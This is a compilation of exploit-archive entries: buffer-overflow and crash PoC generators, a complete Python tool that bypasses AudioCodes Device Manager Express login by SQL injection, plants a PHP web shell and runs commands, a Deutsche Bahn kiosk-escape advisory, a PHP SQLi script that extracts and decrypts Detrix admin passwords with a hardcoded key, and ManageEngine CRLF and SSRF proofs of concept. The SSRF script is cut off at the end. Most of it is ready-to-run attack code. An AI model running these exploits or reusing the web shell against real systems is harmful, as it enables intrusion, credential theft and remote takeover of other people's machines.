    print("[!] Error creating the file")
# Exploit Title: DeviceLock Plug and Play Auditor 5.72 - Unicode Buffer Overflow (SEH)
# Date: 2018-05-04
# Exploit Author: Youssef mami
# Vendor Homepage: https://www.devicelock.com/freeware.html/
# Version: 5.72
# CVE : CVE-2018-10655
# Security Issue:
DeviceLock Plug and Play Auditor "DLPnpAuditor.exe" is vulnerable to a Unicode type of buffer overflow, when supplied a specially crafted textfile using the "scan network" from file option.
The buffer overflow payload is converted to Unicode character encoding. Applications use Unicode for internationalization so that
different character sets are represented consistently on most systems around the world.
e.g.
Before the buffer overflow payload was placed on the stack it was expanded with 0x00, so "RRRR" becomes the Unicode representation "00520052"
(0x52 is the ASCII code for 'R'), which contains NULL (0x00) bytes. Exploiting the vulnerable program therefore requires a Unicode-compatible address
(one that contains null bytes) and an encoding method such as the "alpha2" encoder.
Stack dump:
SEH chain of main thread
Address SE handler
0018EE00 ntdll.771B34DD
0018FBD4 00520052
00520052 A42F0000
E5C1411F *** CORRUPT ENTRY ***
EAX 00000000
ECX 00520052
EDX 771B34DD ntdll.771B34DD
EBX 00000000
ESP 0018EDEC
EBP 0018EE0C
ESI 00000000
EDI 00000000
EIP 00520052
C 0 ES 002B 32bit 0(FFFFFFFF)
P 1 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 1 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00210246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
3 2 1 0 E S P U O Z D I
FST 4020 Cond 1 0 0 0 Err 0 0 1 0 0 0 0 0 (EQ)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
# Exploit/POC:
1) Create POC textfile
2) Under File menu "Scan Network" choose "From file" under drop down menu.
3) Choose the exploit file select the Scan "Domain" box and run it.
#Unicode SEH Buffer Overflow
#https://www.devicelock.com/download/
# 1036 bytes of filler, then 8 'R' bytes that land in the SEH record
# (matching the 00520052 values in the stack dump above), then 56 'B'.
PAYLOAD="A"*1036+"R"*8+"B"*56 #Control SEH
# NOTE(review): file is not closed if write() raises; a with-block would be safer.
file=open("devicelock-bof.txt","w")
file.write(PAYLOAD)
file.close()
print 'DeviceLock Plug and Play Auditor v5.72 (freeware)'
print 'Exploit POC file created.'
print 'hyp3rlinx'
# Disclosure Timeline:
Vendor Notification: April 17, 2018
No reply
Vendor Notification: April 22, 2018
No reply
May 6, 2018 : Public Disclosure
#Exploit Title: Device Monitoring Studio 8.10.00.8925 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-02-04
#Tested Version: 8.10.00.8925
#Tested on: Windows 7 Service Pack 1 x64
#Steps to produce the crash:
#1.- Run python code: Device_Monitoring_Studio_8.10.00.8925.py
#2.- Open code.txt and copy content to clipboard
#3.- Open Device Monitoring Studio
#4.- Select "Tools" > "Connect to New Server"
#5.- Select "Enter the name server or address" and Paste Clipboard
#6.- Select "Ok"
#7.- Crashed
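# 1000 'A' (0x41) bytes; pasted into the "name server or address" field per
# the steps above.
cod = "\x41" * 1000
# with-block closes the file even if write() raises; the original's explicit
# close() would have been skipped on error.
with open('code.txt', 'w') as f:
    f.write(cod)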
# Exploit Title: Device Manager Express 7.8.20002.47752 - Remote Code Execution (RCE)
# Date: 02-12-22
# Exploit Author: 0xEF
# Vendor Homepage: https://www.audiocodes.com
# Software Link: https://ln5.sync.com/dl/82774fdd0/jwqwt632-s65tncqu-iwrtm7g3-iidti637
# Version: <= 7.8.20002.47752
# Tested on: Windows 10 & Windows Server 2019
# Default credentials: admin/admin
# SQL injection + Path traversal + Remote Command Execution
# CVE: CVE-2022-24627, CVE-2022-24629, CVE-2022-24630, CVE-2022-24632
#!/usr/bin/python3
import requests
import sys
import time
import re
import colorama
from colorama import Fore, Style
import uuid
# Shared request headers; execute() sends its body as a pre-encoded string
# and patch_ext() a dict, both with this explicit content type.
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
def menu():
    """Print the three-line tool banner (the hex digits spell 'Exploit')."""
    rule = '-----------------------------------------------------------------------'
    title = 'AudioCodes Device Manager Express 45 78 70 6C 6F 69 74 '
    print('\n'.join([rule, title, rule]))
def optionlist(s,target):
    """Print the action menu, read one numeric choice and dispatch it.

    `s` is the authenticated requests.Session from bypass_auth(), `target`
    the host. Mode 'a' passed to upload_file() uploads a local file, mode
    'b' plants the PHP backdoor. Any exception -- including the ValueError
    from a non-numeric answer, which is the documented "any other key
    quits" path -- terminates the process.
    """
    try:
        print('\nOptions: (Press any other key to quit)\n'
              '-----------------------------------------------------------------------\n'
              '1: Upload arbitrary file\n'
              '2: Download arbitrary file\n'
              '3: Execute command\n'
              '4: Add backdoor\n'
              '-----------------------------------------------------------------------')
        option = int(input('Select: '))
        if(option == 1):
            t = 'a'
            upload_file(s,target,t)
        elif(option == 2):
            download_file(s,target)
        elif(option == 3):
            execute(s,target)
        elif(option == 4):
            t = 'b'
            upload_file(s,target,t)
    except:
        # NOTE(review): bare except also swallows KeyboardInterrupt and
        # SystemExit raised by the callees.
        sys.exit()
def bypass_auth(target):
    """Obtain an admin session on the target's login endpoint.

    Each entry of payload_list is submitted in the `p` form field
    (CVE-2022-24627); the first response whose body contains
    'Configuration' is treated as a successful admin login and the
    requests.Session holding its cookies is returned. On a failed attempt
    main() is called again. Any exception exits the process.

    NOTE(review): the source's indentation was lost; the `else` below is
    read as belonging to the `if`, but it may originally have belonged
    to the `for` loop (run only after all payloads failed).
    """
    try:
        print(f'\nTrying to bypass authentication..\n')
        url = f'http://{target}/admin/AudioCodes_files/process_login.php'
        s = requests.Session()
        # CVE-2022-24627
        payload_list = ['\'or 1=1#','\\\'or 1=1#','admin']
        for payload in payload_list:
            body = {'username':'admin','password':'','domain':'','p':payload}
            r = s.post(url, data = body)
            if('Configuration' in r.text):
                print(f'{Fore.GREEN}(+) Authenticated as Administrator on: {target}{Style.RESET_ALL}')
                time.sleep(1)
                return(s)
            else:
                print(f'{Fore.RED}(-) Computer says no, can\'t login, try again..{Style.RESET_ALL}')
                main()
    except:
        sys.exit()
def upload_file(s,target,t):
    """Upload a file through BrowseFiles.php after whitelisting its extension.

    `t` selects the mode: 'a' uploads a local file of the user's choice to
    a directory the user enters; 'b' uploads a one-line PHP file (named
    after the entered file name, extension replaced by .php) into the web
    root's region/ directory and prints its URL. In both modes the
    extension is first added to the server-wide upload whitelist via
    patch_ext(opt '1', CVE-2022-24629) and removed again afterwards
    (opt '2'), also on the error path. From a detection standpoint, the
    'saveext' changes to the global settings are the durable trace this
    leaves on the server.

    NOTE(review): in the except branch `ext` is unbound if the failure
    happened before it was assigned (e.g. a name without a dot makes
    rsplit()[1] raise IndexError), which would raise NameError there.
    """
    try:
        url = f'http://{target}/admin/AudioCodes_files/BrowseFiles.php?type='
        param = uuid.uuid4().hex
        file = input('\nEnter file name: ')
        # read extension
        ext = file.rsplit( ".", 1 )[ 1 ]
        if (t=='b'):
            # remove extension
            file = file.rsplit( ".", 1 )[ 0 ] + '.php'
            ext = 'php'
        patch = '1'
        if(file != ''):
            if(patch_ext(s,target,patch,ext)):
                # CVE-2022-24629
                print(f'{Fore.GREEN}(+) Success{Style.RESET_ALL}')
                if(t=='a'):
                    dest = input('\nEnter destination location (ex. c:\): ')
                    print(f'\nUploading file to {target}: {dest}{file}')
                    files = {'myfile': (file, open(file,'rb'), 'text/html')}
                    body = {'dir': f'{dest}', 'type': '', 'Submit': 'Upload'}
                    r = s.post(url, files=files, data=body)
                    print(f'{Fore.GREEN}(+) Done{Style.RESET_ALL}')
                if(t=='b'):
                    shell = f'<?php echo shell_exec($_GET[\'{param}\']); ?>'
                    files = {f'myfile': (file, shell, 'text/html')}
                    body = {'dir': 'C:/audiocodes/express/WebAdmin/region/', 'type': '', 'Submit': 'Upload'}
                    r = s.post(url, files=files, data=body)
                    print(f'\nBackdoor location:')
                    print(f'{Fore.GREEN}(+) http://{target}/region/{file}?{param}=dir{Style.RESET_ALL}')
                # Restore the original extension whitelist.
                patch = '2'
                time.sleep(1)
                patch_ext(s,target,patch,ext)
            else:
                print(f'{Fore.RED}(-) Could not whitelist extension {ext}.. Try something else\n{Style.RESET_ALL}')
    except:
        print(f'{Fore.RED}(-) Computer says no..{Style.RESET_ALL}')
        patch = '2'
        patch_ext(s,target,patch,ext)
def download_file(s, target: str):
    """Fetch an arbitrary server-side file via BrowseFiles.php?view=<path>.

    CVE-2022-24632. The user-typed path is sent unencoded in the query
    string. A non-empty response body is written to the current directory
    under the path's last backslash-separated component; note that any
    non-empty error page would be saved the same way, since only the length
    is checked. Exceptions end the program via sys.exit().
    """
    # CVE-2022-24632
    try:
        file = input('\nFull path to file, eg. c:\\windows\win.ini: ')
        if(file != ''):
            url = f'http://{target}/admin/AudioCodes_files/BrowseFiles.php?view={file}'
            r = s.get(url)
            if (len(r.content) > 0):
                print(f'{Fore.GREEN}\n(+) File {file} downloaded\n{Style.RESET_ALL}')
                # Keep only the basename so the local write stays in cwd.
                file = str(file).split('\\')[-1:][0]
                # The handle is not closed explicitly.
                open(file, 'wb').write(r.content)
            else:
                print(f'{Fore.RED}\n(-) File not found..\n{Style.RESET_ALL}')
        else:
            print(f'{Fore.RED}\n(-) Computer says no..\n{Style.RESET_ALL}')
    except:
        sys.exit()
def execute(s, target: str):
    """Interactive command loop against BrowseFiles.php?cmd=ssh (CVE-2022-24631).

    Each typed command is sent as the raw body `ssh_command=<command>` (string
    concatenation, no form-encoding) with the module-level `headers`; the
    reply is scraped from the HTML between `</form>` and `</section>` and
    printed. An empty command returns to optionlist() and leaves the loop.
    Exceptions end the program via sys.exit().
    """
    try:
        while True:
            # CVE-2022-24631
            command = input('\nEnter a command: ')
            if(command == ''):
                optionlist(s,target)
                break
            print(f'{Fore.GREEN}(+) Executing: {command}{Style.RESET_ALL}')
            body = 'ssh_command='+ command
            url = f'http://{target}/admin/AudioCodes_files/BrowseFiles.php?cmd=ssh'
            r = s.post(url, data = body, headers=headers)
            print('-----------------------------------------------------------------------')
            time.sleep(1)
            # Strip the surrounding markup and literal "\r\n" sequences from the
            # str() of the raw bytes.
            print((", ".join(re.findall(r'</form>(.+?)</section>',str(r.content)))).replace('\\r\\n', '').replace('</div>', '').replace('<div>', '').replace('</DIV>', '').replace('<DIV>', '').replace('<br/>', '').lstrip())
            print('-----------------------------------------------------------------------')
    except:
        sys.exit()
def patch_ext(s, target: str, opt: str, ext: str):
    """Add (opt '1') or remove (opt '2') `.ext` from the upload whitelist.

    Posts a `saveext` action to ajax/ajaxGlobalSettings.php with the module-
    level `headers`. Returns True when the response text contains `ext`;
    otherwise falls off the end and returns None. Note that for opt '2' the
    "extension removed" line is printed before the request is sent, and the
    True/None result is based on whether `ext` is still echoed back.
    Any other `opt` value leaves `body` unbound and hits the except branch.
    """
    try:
        if(opt == '1'):
            print('\nTrying to add extension to whitelist..')
            body = {'action':'saveext','extensions':f'.cab,.cfg,.csv,.id,.img,.{ext},.zip'}
        if(opt == '2'):
            print('\nCleaning up..')
            body = {'action':'saveext','extensions':'.cab,.cfg,.csv,.id,.img,.zip'}
            print(f'{Fore.GREEN}(+) {ext.upper()} extension removed\n{Style.RESET_ALL}')
        url = f'http://{target}/admin/AudioCodes_files/ajax/ajaxGlobalSettings.php'
        r = s.post(url, data = body, headers=headers)
        time.sleep(1)
        if(f'{ext}' in r.text):
            return True
    except:
        sys.exit()
def main():
    """Entry point: validate argv, show the menu, authenticate, then dispatch.

    Expects exactly one argument (the target IP). Exits with status 1 on
    usage error. bypass_auth() returns a session only on success, so
    optionlist() runs only when authenticated.
    """
    if len(sys.argv) != 2:
        print(' Usage: ' + sys.argv[0] + ' <target IP>')
        print(' Example: ' + sys.argv[0] + ' 172.16.86.154')
        sys.exit(1)
    target = sys.argv[1]
    menu()
    s = bypass_auth(target)
    if(s):
        optionlist(s,target)
# Script entry point.
if __name__ == '__main__':
    main()
# Timeline
# 11-11-2021 Vulnerabilities discovered
# 12-11-2021 PoC written
# 15-11-2021 Details shared with vendor
# 02-12-2021 Vendor confirmed vulnerabilities
# 03-12-2021 CVEs requested
# 09-12-2021 Vendor replied with solution and notified customers
# 07-02-2022 Product EOL announced
# 10-03-2022 CVEs assigned
# 02-12-2022 Disclosure of findings
# Exploit Title: Deutsche Bahn Ticket Vending Machine Local Kiosk - Privilege Escalation
# Date: 2019-12-18
# Exploit Author: Vulnerability-Lab
# Vendor Homepage: https://www.bahn.de/db_vertrieb/view/leistungen/automaten-fahrkartenentwerter.shtml
# Tested on: Windows XP
Document Title:
===============
Deutsche Bahn Ticket Vending Machine - Local Kiosk Privilege Escalation Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2191
Vulnerability Magazine:
https://www.vulnerability-db.com/?q=articles/2019/12/13/zero-day-vulnerability-deutsche-bahn-ticket-machine-series-system-uncovered
Release Date:
=============
2019-12-14
Vulnerability Laboratory ID (VL-ID):
====================================
2191
Common Vulnerability Scoring System:
====================================
6.4
Vulnerability Class:
====================
Privilege Escalation
Product & Service Introduction:
===============================
Customers can buy tickets at our ticket machines at any time, regardless
of opening hours. Thus, the vending machine also
secures sales in rural areas.
- innovatively designed user guidance
- Real-time timetable information for rail traffic
- traveler information
- ticket paper supply
- free fault hotline: 0800 2886644
- Professional and contemporary maintenance
The ticket vending machine can also be configured according to
individual requirements. The housing can be designed as desired.
Customers can purchase their tickets with different means of payment.
User guidance is available in different languages.
(Copy of the Homepage:
https://www.bahn.de/db_vertrieb/view/leistungen/automaten-fahrkartenentwerter.shtml
)
Abstract Advisory Information:
==============================
The Vulnerability Laboratory core research team discovered a local kiosk
privilege escalation vulnerability in the Deutsche Bahn ticket vending
machine series running Windows XP.
Vulnerability Disclosure Timeline:
==================================
2019-12-14: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Local
Severity Level:
===============
Medium
Authentication Type:
====================
No authentication (guest)
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Responsible Disclosure Program
Technical Details & Description:
================================
A kiosk mode escalation vulnerability has been discovered in the
official Deutsche Bahn ticket vending machine series for Windows.
The security vulnerability allows local attackers to bypass the kiosk
mode and compromise the local file system and applications.
It is possible for local attackers to break out of the kiosk mode of the
Deutsche Bahn vending machine application if
the Password Agent (PasswordAgent.exe) of the system receives a timeout
or has a runtime error in the program
itself in the background. These errors can occur due to aborted
sessions, unclean logout or common errors when
using the application at system level.
In the event of a local error, attackers can bring the error message to
the foreground by pressing the number field - Cancel
during a transaction. After the error message becomes visible, the
attacker can click on a link of the error message where you
can normally see what the error report contains. The attacker will then
be redirected to a form in the error message, where he
can search for errors in a collection of microsoft articles via "Submit
/ Dont' Submit" or another link on the online path. There
the attacker clicks on it and receives the web browser. From the web
browser, the attacker retrieves the options menu and can access
the local system directory and has then the ability to compromise the
ticket vending machine with windows xp.
The error message is normally deactivated on these devices through a
hardening process by the service provider. In this particular case
the exception handling of Windows was not deactivated or moved to the
background, which allows the attacker to move on to other
options and finally access the file system via the browser.
The ticket vending machine vulnerability requires no user interaction
and can only be exploited by local attackers with physical
device access. No keyboard or front loader opening required.
Vulnerable System(s):
[+] Windows XP
Affected Component(s):
[+] Exception Handling (Error Message Content)
Proof of Concept (PoC):
=======================
The local vulnerability can be exploited by local attackers with
physical device access without user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
PoC: Sheet
PasswordAgent.exe := Unexpected Error (Background) - Runtime/Session/Timeout
=> Transaction Application => Cancel := Unexpected Error (Background) -
Runtime/Session/Timeout (Front)
=> Click Error Report => Click Search Collection => Web Browser => Local
File System => PWND!
What are attackers able to do when the file system of the vending
machine is accessible this way?
1. Injection of local malware onto the ticket machine (editor / debugger /
cmd / ps - e.g. ransomware/malware)
2. Local manipulation for skimming devices to assist (transmit prepares)
2. Phishing of local credentials from screen via system (db browser
application)
3. Intercept or manipulation to access card information (local file
system - sniff/extract)
4. Crash or freeze the computer system (exp. kill of process / loop script)
5. Scare or joke activities (e.g. html / js to front screens with web
browser or by a new window process)
Reference(s):
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6457.JPG
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6458.JPG
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6460.JPG
Solution - Fix & Patch:
=======================
There are now several problems related to system hardening that can be
resolved:
1. It should not be possible for users with system user rights to use
the web browsers
2. The error message menu can be deactivated or completely modified
3. Some functions in menus can be deactivated by hardening (browser,
messages & Co.)
4. Check that all other tasks are always running in the background or
are being moved there permanently
5. The deutsche bahn vending machine application and user interface
should be shut down in the event of persistent errors in the foreground
6. The testing activities were logged but did not trigger
any alert for defensive purposes
Deutsche Bahn: Patch Rollout in Progress
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/073915298_0.png
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/dbatm78235.png
Security Risk:
==============
The security risk of the local ticket vending machine system
vulnerability is estimated as high. The bug to escalate can be easily
exploited by local interaction with the touch display to access the file
system.
Credits & Authors:
==================
Benjamin K.M. -
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material, contact (admin@ or research@) to ask for permission.
Copyright © 2019 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
#!/usr/bin/php
/*
# Exploit Title: Detrix EDMS cleartext user password remote SQLI exploit
# Google Dork:
# Date: Jul 2019
# Exploit Author: Burov Konstantin
# Vendor Homepage: forum.detrix.kz
# Software Link:
https://www.documentov.com/index.php?route=document/search&search=1.2.3.1505.zip&page=1&limit=20&document_uid=3d7bae5a-c2e5-11e8-9ed8-b7ed7eb0f5bb
# Version: any
# Tested on: Detrix 1.2.3.1505
*/
<?php
/*---------------------------CHANGE-ME--------------------------------*/
$URL = "http://192.168.56.6"; // Set URL for the target host
$user_id = 0; // 0 - Default admin ID
/*--------------------------------------------------------------------*/
$banner = "Exploiting SQLi vuln and password decrypting for Detrix\n".
    "http://forum.detrix.kz\nhttps://github.com/sadshade/Detrix-Passwords-PoC \n".
    "sad.2.shade@mail.com, 2019.\n\n";

// SQLi request
// Injected through the `login` form field. The password of the row selected
// by $user_id (ORDER BY id OFFSET $user_id) is wrapped in a__ ... __a and
// forced through a NUMERIC cast; the a__(...)__a marker is read back from the
// response by the preg_match() below. The "OR"."DER BY" split is ordinary
// string concatenation, i.e. ORDER BY.
$sql_req =
    "login' AND 99=CAST('a__'||(SELECT COALESCE(CAST(password AS ".
    "CHARACTER(10000)),(CHR(32))) FROM manuscript.ref_system_users OR".
    "DER BY id OFFSET " . $user_id . " LIMIT 1)::text||'__a' ".
    "AS NUMERIC) AND 'a'='a";

// Form-encoded POST body; the injection travels in the login field.
$data = array('password' => 'pass',
    'login' => $sql_req);
$options = array(
    'http' => array(
        'header' => "Content-type: application/x-www-form-urlencoded\r\n",
        'method' => 'POST',
        'content' => http_build_query($data)
    )
);

// Key from %detrix%/system/utils/MSF_string.php
// Static product-wide key: stored passwords are reversibly encrypted (Blowfish
// ECB, see openssl_decrypt below) rather than hashed, which is why the
// injection yields cleartext credentials. Mitigation on the product side is
// a one-way password hash.
$sSuperDuperSecretKey =
    "!-eeflslskdjfla;456864~}{fjkdlswkfkll@#$%#$9f0sf8a723#@";

echo $banner;
try {
    $context = stream_context_create($options);
    echo "Send SQLi to $URL...\n";
    $result = file_get_contents($URL, false, $context);
} catch (Exception $e) {
    // NOTE(review): file_get_contents() does not throw; on failure it returns
    // false and emits a warning, so this branch is effectively dead and
    // $result becomes false (which the loose != "" test below treats as an
    // empty response).
    echo 'Error: ', $e->getMessage(), "\n";
}

if ($result != "") {
    // On success the response body contains the injected marker
    // "a__<base64 ciphertext>__a".
    if (preg_match("/\"a__(.+)__a\"/", $result, $encrypted_pass) == 1) {
        $clear_pass = trim(
            openssl_decrypt(base64_decode($encrypted_pass[1]),
                "BF-ECB", $sSuperDuperSecretKey,
                OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING)
        ); // Decrypt pass
        echo "Pass for User id $user_id: $clear_pass \n";
    } else echo "Error: no such User id:$user_id or empty password!\n";
} else echo "Error: empty Response or error!\n"
?>
# Exploit Title: Desktop Central 9.1.0 - Multiple Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2021-02-14
# Software Link : http://www.desktopcentral.com
# Tested Version: 9.1.0 (Build No: 91084)
# Tested on: Windows 10
# Vulnerability Type: CRLF injection (CRLF) - 1
CVSS v3: 6.1
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-93
Vulnerability description: CRLF injection vulnerability in ManageEngine
Desktop Central 9.1.0 allows remote attackers to inject arbitrary HTTP
headers and conduct HTTP response splitting attacks via the fileName
parameter in a /STATE_ID/1613157927228/InvSWMetering.csv.
Proof of concept:
GET
https://localhost/STATE_ID/1613157927228/InvSWMetering.csv?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=true
HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101
Firefox/85.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
DNT: 1
Connection: keep-alive
Referer:
https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMetering
Upgrade-Insecure-Requests: 1
Content-Length: 0
Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084;
STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228;
showRefMsg=false; summarypage=false;
DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1;
JSESSIONID=0B20DEF653941DAF5748931B67972CDB;
JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024
Host: localhost
Response:
HTTP/1.1 200 OK
Date:
Server: Apache
Pragma: public
Cache-Control: max-age=0
Expires: Wed, 31 Dec 1969 16:00:00 PST
SET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly;
Secure
Set-Cookie: buildNum=91084; Path=/
Set-Cookie: showRefMsg=false; Path=/
Set-Cookie: summarypage=false; Path=/
Set-Cookie: dc_customerid=1; Path=/
Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/
Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/
Set-Cookie: screenResolution=1280x1024; Path=/
Content-Disposition: attachment; filename=any
Set-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013.csv
X-dc-header: yes
Content-Length: 95
Keep-Alive: timeout=5, max=20
Connection: Keep-Alive
Content-Type: text/csv;charset=UTF-8
# Vulnerability Type: CRLF injection (CRLF) - 2
CVSS v3: 6.1
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-93
Vulnerability description: CRLF injection vulnerability in ManageEngine
Desktop Central 9.1.0 allows remote attackers to inject arbitrary HTTP
headers and conduct HTTP response splitting attacks via the fileName
parameter in a /STATE_ID/1613157927228/InvSWMetering.pdf.
Proof of concept:
GET
https://localhost/STATE_ID/1613157927228/InvSWMetering.pdf?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=true
HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101
Firefox/85.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
DNT: 1
Connection: keep-alive
Referer:
https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMetering
Upgrade-Insecure-Requests: 1
Content-Length: 0
Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084;
STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228;
showRefMsg=false; summarypage=false;
DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1;
JSESSIONID=0B20DEF653941DAF5748931B67972CDB;
JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024
Host: localhost
HTTP/1.1 200 OK
Date:
Server: Apache
Pragma: public
Cache-Control: max-age=0
Expires: Wed, 31 Dec 1969 16:00:00 PST
SET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly;
Secure
Set-Cookie: buildNum=91084; Path=/
Set-Cookie: showRefMsg=false; Path=/
Set-Cookie: summarypage=false; Path=/
Set-Cookie: dc_customerid=1; Path=/
Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/
Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/
Set-Cookie: screenResolution=1280x1024; Path=/
Content-Disposition: attachment; filename=any
Set-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013
X-dc-header: yes
Content-Length: 4470
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/pdf;charset=UTF-8
# Vulnerability Type: Server-Side Request Forgery (SSRF)
CVSS v3: 8.0
CVSS vector: CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-918 Server-Side Request Forgery (SSRF)
Vulnerability description: A Server-Side Request Forgery (SSRF) vulnerability
in ManageEngine Desktop Central 9.1.0 allows an attacker to force the
vulnerable server to send requests to third-party servers or
to internal resources. The vulnerability is exploitable by an authenticated attacker
with network access via HTTP and can then be leveraged to launch specific
attacks such as a cross-site port attack, service enumeration, and various
other attacks.
Proof of concept:
Save this content in a python file (ex. ssrf_manageenginedesktop9.py),
change the variable sitevuln value with ip address:
import argparse
from termcolor import colored
import requests
import urllib3
import datetime
urllib3.disable_warnings()
# Banner printed at import time, i.e. before argument parsing.
print(colored('''
------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------
''',"red"))
def smtpConfig_ssrf(target: str, port: str, d: str | None):
    """Infer whether target:port is open by timing an SMTP-validation request.

    Calls smtpConfig.do?actionToCall=valSmtpConfig on the Desktop Central
    host `sitevuln` (hard-coded to 'localhost'; the advisory says to change
    it) with `target`/`port` as the SMTP server. A reply slower than 5 s, or
    an exception after more than 10 s, is reported as 'open'; otherwise
    'closed'. The string 'updateRefMsgCookie' in the body means the session
    cookie was rejected. `d == "0"` prints the timing and the response body.

    Returns a colored status string. The final 'unknown' return is
    unreachable because every try/except path returns earlier.

    NOTE(review): the mailing-list copy wrapped the long string literals;
    they have been re-joined here. Confirm against the original source.
    """
    now1 = datetime.datetime.now()
    text = ''
    sitevuln = 'localhost'
    url = 'https://'+sitevuln+'/smtpConfig.do?actionToCall=valSmtpConfig&smtpServer='+target+'&smtpPort='+port+'&senderAddress=admin%40manageengine.com&validateUser=false&tlsEnabled=false&smtpsEnabled=false&toAddress=admin%40manageengine.com'
    # Hard-coded session cookie from the author's test instance; it must be
    # replaced with a live session for the request to be accepted.
